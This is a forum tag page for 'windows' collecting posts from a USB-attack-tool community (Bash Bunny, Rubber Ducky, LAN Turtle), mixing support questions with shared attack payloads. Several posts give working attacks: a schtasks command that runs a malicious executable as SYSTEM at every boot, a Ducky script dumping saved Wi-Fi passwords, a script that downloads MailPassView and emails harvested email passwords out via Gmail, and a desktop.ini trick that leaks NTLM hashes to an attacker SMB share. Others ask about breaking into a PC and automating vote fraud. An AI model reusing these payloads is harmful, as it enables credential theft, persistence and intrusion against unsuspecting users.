Search the Community
Showing results for tags 'windows'.
-
At first: Sorry for my bad English, I´m german and only 14 years old. I upload an .exe file from my computer to my FTP Server with the FTP.exe(cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64 Bit System. I accidently asked the question on StackOverflow 2 hours ago, and some people answered that I have to active binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn´t working anyways. The .exe looks identical after download, but instead of having the old icon it shows up the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn´t working either, so I don´t think, that FTP.exe is the problem here. The commands I used + Output(maybe the translation isn´t correct, but I think you know what the output meant): C:\WINDOWS\system32>ftp myftpserver.com Connection to icarus.bplaced.net established. 220 Welcome to myftpserver.com, FTP server standing by ... 504 Unknown command User (myftpserver.com:(none)): user 331 Hello user, your FTP account password is required: password: password 230-Login successful, your current directory is / 230 34349 Kbytes used (3%) - authorized: 1048576 Kb ftp> binary 200 TYPE is now 8-bit binary ftp> get example.exe 200 PORT command successful 150-Connecting to port 61051 150 347.5 kbytes to download 226-File successfully transferred 226 1.648 seconds (measured here), 210.83 Kbytes per second FTP: 355794 bytes received in 1.91 seconds 186.38KB/s ftp> Thanks and greetings, c0ntriX Edit: I´m owning a 64-Bit System.
-
Hi there, I just finished the first version of my BB keylogger. It basicly launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.
-
how does the bash bunny gain execution access in mass storage attack mode (in windows)? will it always work when windows autorun is disabled? i would love to get a detailed explanation of how it works
-
how does the bash bunny gain execution access in mass storage attack mode (in windows)? will it always work when windows autorun is disabled? i would love to get a detailed explanation of how it works
-
Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172 -
Violation of CoC
-
- 1
-
-
- powershell
- windows
- (and 2 more)
-
Violation of CoC
- 1 reply
-
- 3
-
-
- powershell
- windows
- (and 3 more)
-
Hi, When I am trying to install the tools_installer payload the bash the green led is plain solid and windows 10 can seem to be able to install the driver for ATTACKMODE SERIAL I guess ? Did anyone manage to solve this ? I can connect to it via SSH (Serial) when in arming mode so I am not sure what is going on. I did try the automatic driver search function and google around a bit for a generic driver but I am still a bit stuck. Can anyone help ? / Albert
-
Hi, I just received my Bash Bunny a few days ago and I've been tinkering around with it. It seems, to me, to be quite buggy: - Windows does not recognise the RNDIS interface at all. Not on Windows 7, not on Windows 10. - On MacOS, the ethernet interface *sometimes* works, sometimes it doesn't. When it does work, *sometimes* it is possible to connect to the Bunny using, quite often, SSH doesn't start up even though FTP and other services are running. This even after a few minutes waiting. - The serial interface often conflicts with having network & storage together, resulting in nothing happening or giving only access to storage. (I did this by adding "SERIAL" to the standard payloads already on the Bunny) - Using the manuals found online for network sharing (MacOS Internet sharing through 172.16.64.64), I cannot access the internet from the Bunny, so I cannot update it. On Windows, that's entirely out of the question as Windows does not even recognise the RNDIS network device. Windows gives the following message on the RNDIS driver: The drivers for this device are not installed. (Code 28) There are no compatible drivers for this device. To find a driver for this device, click Update Driver.
-
Hey, i just found a method to start your malicious msf/or whatever payload as SYSTEM user from boot. This little shell line (shell needs to be run as administrator): schtasks /create /tn "Windows Help Service" /tr C:\maliciousfile.exe /sc onstart /ru SYSTEM /F creates a Task named "Windows Help Service" which runs C:\maliciousfile.exe every startup as SYSTEM user. Keep in mind that when using this as a payload you may need to escape the / and \ and ".I'm currently working on a C++ Version of PSExec (Source) to get rid of the .Net Framework. Feel free to post your Payload using the simple onliner which starts your malicious file as System every boot :)
-
CrackMapExec is a fantastic tool developed by Byt3bl33de3r and can be found here: https://github.com/byt3bl33d3r/CrackMapExec As stated in the repo's README, it's powered by Impacket and takes queues and inspiration from several other tools targeting SMB, WMI, and Windows in general. I recommend reading up on it if you are unfamiliar. For now, it's worth mentioning that CrackMapExec (CME) is also a Python library that can be installed with pip and used like a standard tool, i.e. you can type "crackmapexec" and use it without needing a Python script to act as a vehicle. I installed it on the Bunny and have used it for some network based attacks using RNDIS_ETHERNET mode. If you'd like to do the same, I encourage you to install pip. Connect to the Bunny via SSH and use curl with the "insecure" and output file options, like so: cd /pentest curl -k -O https://bootstrap.pypa.io/get-pip.py Now check your Bunny's current system date and time. If it's not current then you need to update it or Python and SSL will throw a fit because the date/time is wrong. Then use Python to run the script: python get-pip.py That may take some time to complete, but pip will open up a lot of possibilities and assist with Python tools and dependencies. Once that's done, you'll need to install packages required for supporting OpenSSL/PyOpenSSL. You'll need to have shared your internet connection with the Bunny for this to work. apt-get install build-essential libssl-dev libffi-dev python-dev Once those packages have been installed successfully, you should now be able to successfully use pip to install CME. If something goes wrong with this next step, it's almost certainly related to the cryptography library and a missing dependency. Read the error carefully and Google it. You can be certain there will be several GitHub and StackOverflow hits at the top. Run pip: pip install crackmapexec Once that is done, you can test everything by just running "crackmapexec" in your terminal and you should see CME spit out its help text and version information. You're now ready to include CME commands in your Bunny payloads. CME is a network attack tool, so you can use it against locked PCs. A very basic example of this is: crackmapexec $TARGET_IP That command tells CME to connect to the target's IP address via SMB. If that much can be done, CME will return a hostname and the target's operating system build. This is a fast "attack" and can be used to, let's say, fingerprint a machine quickly to prove you had access and collect some information. You can go a step further with this: crackmapexec $TARGET_IP -u "" -p "" That tells CME to try a Null session with SMB. If the target disallows Null sessions nothing bad happens. You still get the basic OS details. If the target allows for a Null session to be initiated then you can check for success and then potentially proceed with something like running CME again with the addition of "--shares" to enumerate network shares and gather additional information. If you happen to have a password hash or credentials from an earlier attack (perhaps phishing or passed to you from a teammate), those creds can be used with CME and any CME-based payload can be easily edited to include the credentials for a much wider variety of attacks.
-
- 1
-
-
- crackmapexec
- payload
- (and 3 more)
-
Ok, so here's a payoad that can grab any of the wifi info that the computer is connected to. To find the info once the payload is finished, you need to search for "Log.txt" Only works on Windows DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 1000 REM The @ will be typed as " in the Command prompt STRING cd @%USERPROFILE%\Desktop@ & for /f @tokens=2 delims=: @ %A in ('netsh wlan show interface ^| findstr @SSID@ ^| findstr /v @BSSID@') do set A=%A ENTER DELAY 100 STRING netsh wlan show profiles %A% key=clear | findstr /c:@Network type@ /c:@Authentication@ /c:@Key Content@ | findstr /v @broadcast@ | findstr /v @Radio@>>A.txt ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Network type@ A.txt') do set B=%A ENTER DELAY 100 STRING for /f @tokens=2 delims=: @ %A in ('findstr @Authentication@ A.txt') do set C=%A ENTER DELAY 100 STRING for /f @tokens=3 delims=: @ %A in ('findstr @Key Content@ A.txt') do set D=%A ENTER DELAY 100 STRING del A.txt ENTER DELAY 100 STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt ENTER Feel free to ask any questions and if there's any errors that need to be fixed on to this.
-
Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now. I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114) So of course I started enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE% . Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not native English neither experienced in pentesting like you guys, so.. in that case forgive me. Let me know :) Have a nice day!
-
Hey all, I made a first pass at a rogue-USB-device defense called Beamgun. It's a tiny Windows-only service that listens for keyboards, network adapters, and usb storage devices and takes some user defined action (like locking the workstation or disabling the network adapter). Code's here: https://github.com/JLospinoso/beamgun Two blog posts on how it works (but it's pretty self explanatory): https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://jlospinoso.github.io/infosec/usb rubber ducky/lan turtle/c%23/clr/wpf/.net/security/2016/11/30/beamgun-update-poison-tap.html Y'all are an incredibly innovative group and I'd love if you absolutely attack the crap out of it. Game on!! Josh
-
Hey all, I made a first pass at a rogue-USB-device defense called Beamgun. It's a tiny Windows-only service that listens for keyboards, network adapters, and usb storage devices and takes some user defined action (like locking the workstation or disabling the network adapter). Code's here: https://github.com/JLospinoso/beamgun Two blog posts on how it works (but it's pretty self explanatory): https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://jlospinoso.github.io/infosec/usb rubber ducky/lan turtle/c%23/clr/wpf/.net/security/2016/11/30/beamgun-update-poison-tap.html Y'all are an incredibly innovative group and I'd love if you absolutely attack the crap out of it. Game on!! Josh
-
This is my very first Rubber Ducky script, it utilises things I learnt from the Hak5 crew and others. It also uses a program (MailPassView) from one of my favourite websites for tools Nirsoft. I hope you find it useful..... I have :) REM Author: CTSNWW REM Date: 11/10/2016 REM Lets backup our email account settings and passwords shall we? REM Note: This is my first RubberDucky attempt! REM The Program MailPassView is available from NIRSOFT.NET where you wil also find some other brilliant programs REM REM See https://www.google.com/settings/security/lesssecureapps you need to do this to send to gmail from the command prompt REM REM Some of the delays are large because older computers will struggle to keep up REM DELAY 3000 GUI d CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300 STRING CD %TEMP% ENTER REM -------------Just in case we have run an incomplete version of this script before - clean up STRING del email.txt ENTER DELAY 2000 STRING del mpv.exe ENTER REM -------------Download MailPassView STRING powershell (new-object System.Net.WebClient).DownloadFile('PUT YOUR FULL URL PATH HERE/mailpv.exe','%TEMP%\mpv.exe') ENTER STRING mpv.exe ENTER DELAY 5000 CTRL A DELAY 500 CTRL S DELAY 2000 STRING %TEMP%\email.txt ENTER DELAY 2000 ALT f STRING x DELAY 300 REM -------------email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNTNAME@gmail.com', 'ACCOUNT PASSWORD'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'FROM EMAIL ADDRESS' ENTER STRING $ReportEmail.To.Add('ACCOUNTNAME@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('email.txt') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER REM -------------Clean Up the mess DELAY 8000 STRING del email.txt ENTER STRING del mpv.exe ENTER DELAY 300 STRING exit ENTER GUI d
-
I am running VMware Fusion on a Mac with a Windows 7 guest. My goal is to run the Invoke-Mimikatz payload for credential pilfering, which involves sending WIN-R (GUI R) to the Windows OS. However, because Windows 7 is running as a guest VM, the Windows OS doesn't actually see the ducky connect as a USB keyboard. The ducky connects to the host OS (Mac OSX) instead. When the script sends a 'GUI R', this doesn't seem to get passed to the guest VM (Windows), even if the focus is on the VM at the time. However, if I write a basic script that simply sends a 'STRING Hello World' and 'ENTER', then I see these characters appear, if I first open notepad to give it something to type into. Has anyone tried something like this before, or does anyone have an idea how to go about addressing this? -
Hey there, I'm quite new to using the rubber ducky and just wanted to ask a general question relating to a command that detects the connected wifi on a windows machine. For example, the code below: REM Windows Wifi Grabber DELAY 2000 GUI r DELAY 200 STRING cmd ENTER DELAY 200 STRING netsh wlan show profile name=RANDOMESSID key=clear ENTER Simply opens up cmd and types that command in. My question is if there is a cmd command that can replace "RANDOMESSID" with a command that automatically replaces that section with the connected wifi ESSID on the machine. Thanks!
-
Hi, i notice that when i plug lanturtle in windows 7 pc it can be recognized and install usb 10/100 ethernet card, but in windows 10 i get always nothing installed. So i try to install realtek drivers and it work but how to use it if it doesn't install automatically in windows?
-
Hey, a friend of mine bought an older computer from his employer than is running Vista Home Premium, but his employer has forgotten the administrator password and has no password recovery disk. So my friend hired me to break into it. I'm having problems though. I've tried using OPHCrack on a live disk, but for some reason it can't find the password. Anyone have any ideas?
-
When I am trying to program my Rubber Ducky I get this message. "There was an error flashing, make sure your Ducky is in DFU mode. Can someone make a video of this? Also a video on setting up a Rubber Ducky. When I tried to plug in my USB to my computer I do not see anything, but a sign saying "Hello World" in .txt. By the way this is my first time in this forum. Thank You, To whomever can help me
-
After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-235 Save the desktop.ini as Unicode or UTF-8 file Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini Preparation -> Done Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.
-
please admins, i am not sure which category to post this under thats why am doing it on here. i am sorry if this violates your rules, incase it does please help me move it to the appropriate section. i hope i dont get a query for this tho. i just need help with a script that can do all that the topic says, i am testing a voting site, and ive been able to deduce that i can vote multiple times making use of "advanced cookie manager to clear the cookies sent from the server", "random agent spoofer to randomize the user agent on every request made", "Hide my ip to also randomise my ip after each vote". Note: they are all browser addons. which also means i have to reload the page everytym myself and click on a new ip each time. the only automated one is the random agent spoofer, and i also have to click by myself. dont wana sound lazy or anything but please, anyone who has an idea of how i can get an automated script that does all 3 "IP spoofing, User agent changing, and cookie deleting". any modern programming language would do the trick i guess, but if u know of steps i can take to achieve this by writing my own custom script please your ideas are also welcome. i need it asap. thanks in advance for your answers.
